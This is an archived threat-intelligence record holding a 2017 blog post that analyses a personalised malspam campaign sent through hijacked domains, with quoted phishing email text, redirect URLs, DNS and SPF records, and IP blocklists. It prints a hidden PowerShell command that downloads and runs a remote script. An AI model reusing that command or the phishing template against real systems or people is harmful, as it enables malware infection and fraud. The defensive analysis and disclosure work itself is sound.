{
	"id": "6e726ec8-4fe5-4bbb-b0d2-9dfec08daa34",
	"created_at": "2026-04-06T00:07:31.186045Z",
	"updated_at": "2026-04-10T03:21:33.554307Z",
	"deleted_at": null,
	"sha1_hash": "63b0ad6255d650ac545240d3f3650eb5c4e713cf",
	"title": "Highly personalised malspam making extensive use of hijacked domains",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 68386,
	"plain_text": "Highly personalised malspam making extensive use of hijacked\r\ndomains\r\nArchived: 2026-04-05 21:22:26 UTC\r\nThis spam email contained not only the intended victim's name, but also their home address and an apparently\r\nvalid mobile telephone number:\r\nSent: 14 February 2017 13:52\r\nTo: [redacted]\r\nFrom: \u003ccustomer@localpoolrepair.com\u003e\r\nSubject: Mr [Redacted] Your order G29804772-064 confirmation\r\nDear Mr [redacted],\r\nThank you for placing an order with us.\r\nFor your reference your order number is G29804772-064.\r\nPlease note this is an automated email. Please do not reply to this email.\r\nGet your order G29804772-064 details\r\nYour order has been placed and items in stock will be sent to the address shown below. Please check all\r\nthe details of the order to ensure they are correct as we will be unable to make changes once the order\r\nhas been processed. You will have been notified at the point of order if an item is out of stock already\r\nwith expected delivery date.\r\nDelivery Address\r\n[address redacted]\r\n[telephone number redacted]\r\nDelivery Method:\r\nStandard Delivery\r\nhttps://blog.dynamoo.com/2017/02/highly-personalised-malspam-making.html\r\nPage 1 of 4\n\nYour Order Information\r\nPrices include VAT at 20%\r\nCustomer Service Feedback\r\nWe are always working to improve the products and service we provide to our customers - we do this\r\nthrough a continual review of the product range, and ongoing training of our Customer Service Team.\r\nWe continually strive to improve our levels of service and we welcome feedback from our customers\r\nregarding your buying experience and the product you receive.\r\nFeefo Independent Reviews\r\n21 days after your purchase, you will receive an email from the independent feedback company Feefo.\r\nIt takes less than a minute to complete and we'd really appreciate your feedback!\r\nIMPORTANT INFORMATION ABOUT YOUR ORDER\r\nDelivery\r\nOrder Tracking\r\nOnce your order has left our warehouse we will email you to confirm that the items have been shipped\r\nand include tracking details of the parcel so that you may track delivery progress directly with our\r\ncourier company.\r\nStock Availability\r\nOn very rare occasions not every item will be available when we come to pack and despatch your order.\r\nIf this is the case you will receive an email from us letting you know which items are affected and an\r\nexpected delivery time.\r\nProduct Returns\r\nAll items purchased are covered by our customer friendly returns policy. Please visit for full details.\r\nThank you for placing your order with us. We really appreciate your custom and will do everything\r\nwithin our power to ensure you get the very best of service.\r\nThe data in the spam was identifiable as being a few years old. The intended victim does not appear on the\r\nhaveibeenpwned.com database. My assumption is that this information has been harvested from an undisclosed\r\ndata breach.\r\nI was not able to extract the final payload; however, the infection path is as follows:\r\nhttp://bebracelet.com/customerarea/notification-processing-G29804772-064.doc\r\n--\u003e http://customer.abudusolicitors.com/customerarea/notification-processing-G29804772-064.doc\r\n--\u003e https://customer.affiliate-labs.net/customerarea/notification-processing-G29804772-064.zip\r\nThis ZIP file actually contains a .lnk file with the following PowerShell command embedded in it:\r\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -w hidden -nop -ep bypass -nologo -c\r\nIEX ((New-Object Net.WebClient).DownloadString('http://cristianinho.com/lenty/reasy.ps1'));\r\nI couldn't get a response from the server at cristianinho.com [5.152.199.228 - Redstation, UK]. This looks like a\r\npossibly legitimate but hijacked domain that uses nameservers belonging to Namecheap. But that's not the only\r\nNamecheap connection, because the two \"customer\" subdomains are also using Namecheap hosting (for the\r\nrecord the subdomains are hosted on 185.130.207.37 and 185.141.165.204, which is Host1Plus, UK / Digital\r\nEnergy Technologies, DE).\r\nThree connections to Namecheap are worrying, and certainly we've seen hijacking patterns involving other domain\r\nregistrars. Or it could just be a coincidence..\r\nThe email originated from mx119.argozelo.info on 188.214.88.119 (Hzone, Romania). Just on a hunch, I checked\r\nthe domain argozelo.info and it appears to be a wholly legitimate site about a Portuguese village, registered at\r\nGoDaddy and hosted on Blogger. So why does it need a dedicated mail server?\r\nWell.. this particular rabbit hole goes a little deeper. mx119 gives a clue that there might be more than one\r\nmailserver, and indeed there are 34 of the critters named mx110.argozelo.info through to mx143.argozelo.info\r\nhosted on 188.214.88.110 through 188.214.88.142. But according to Wikipedia, Argozelo only has about 700\r\ninhabitants, so it seems unlikely that they'd need 34 mailservers in Romania.\r\nSo, my guess is that argozelo.info has also been hijacked, and hostnames set up for each of the mailservers. But\r\nwe're not quite finished with this rabbit hole yet. Oh no.\r\nWhat caught my eye was a mailserver on 188.214.88.110 (the same as mx110.argozelo.info) named\r\nmail.localpoolrepair.com, which certainly rang a bell because the email was apparently from\r\ncustomer@localpoolrepair.com - yeah, OK.. the \"From\" in an email can be anything, but this can't be a\r\ncoincidence.\r\nlocalpoolrepair.com appears to be a legitimate but unused GoDaddy-registered domain, hosted at an Athenix\r\nfacility in the US. So why is there a mailserver in a Romanian IP block? A DIG at the records for this domain is\r\nrevealing:\r\n Query for localpoolrepair.com type=255 class=1\r\n  localpoolrepair.com SOA (Zone of Authority)\r\n        Primary NS: dns.site5.com\r\n        Responsible person: hostmaster@site5.com\r\n        serial:2017021207\r\n        refresh:3600s (60 minutes)\r\n        retry:3600s (60 minutes)\r\n        expire:604800s (7 days)\r\n        minimum-ttl:3600s (60 minutes)\r\n  localpoolrepair.com A (Address) 143.95.232.95\r\n  localpoolrepair.com MX (Mail Exchanger) Priority: 10 mail.localpoolrepair.com\r\n  localpoolrepair.com NS (Nameserver) dns2.site5.com\r\n  localpoolrepair.com NS (Nameserver) dns.site5.com\r\n  localpoolrepair.com TXT (Text Field)\r\nv=spf1 ip4:188.214.88.110/31 ip4:188.214.88.112/28 ip4:188.214.88.128/29 ip4:188.214.88.136/30\r\nip4:188.214.88.140/31 ip4:188.214.88.142/32  ~all\r\nSo.. the SPF records are valid for sending servers in the 188.214.88.110 through 188.214.88.142 range. It looks to\r\nme as if localpoolrepair.com has been hijacked and these SPF records added to it.\r\nSo we have hijacked legitimate domains with presumably a neutral or good reputation, and we have valid SPF\r\nrecords. This means that the spam will have decent deliverability. And then the spam itself addresses the victim by\r\nname and has personal details presumably stolen in a data breach. Could you trust yourself not to click the link?\r\nRecommended blocklist (email)\r\n188.214.88.0/24\r\nRecommended blocklist (web)\r\n5.152.199.228\r\n185.130.207.37\r\n185.141.165.204\r\nSource: https://blog.dynamoo.com/2017/02/highly-personalised-malspam-making.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://blog.dynamoo.com/2017/02/highly-personalised-malspam-making.html"
	],
	"report_names": [
		"highly-personalised-malspam-making.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434051,
	"ts_updated_at": 1775791293,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/63b0ad6255d650ac545240d3f3650eb5c4e713cf.pdf",
		"text": "https://archive.orkl.eu/63b0ad6255d650ac545240d3f3650eb5c4e713cf.txt",
		"img": "https://archive.orkl.eu/63b0ad6255d650ac545240d3f3650eb5c4e713cf.jpg"
	}
}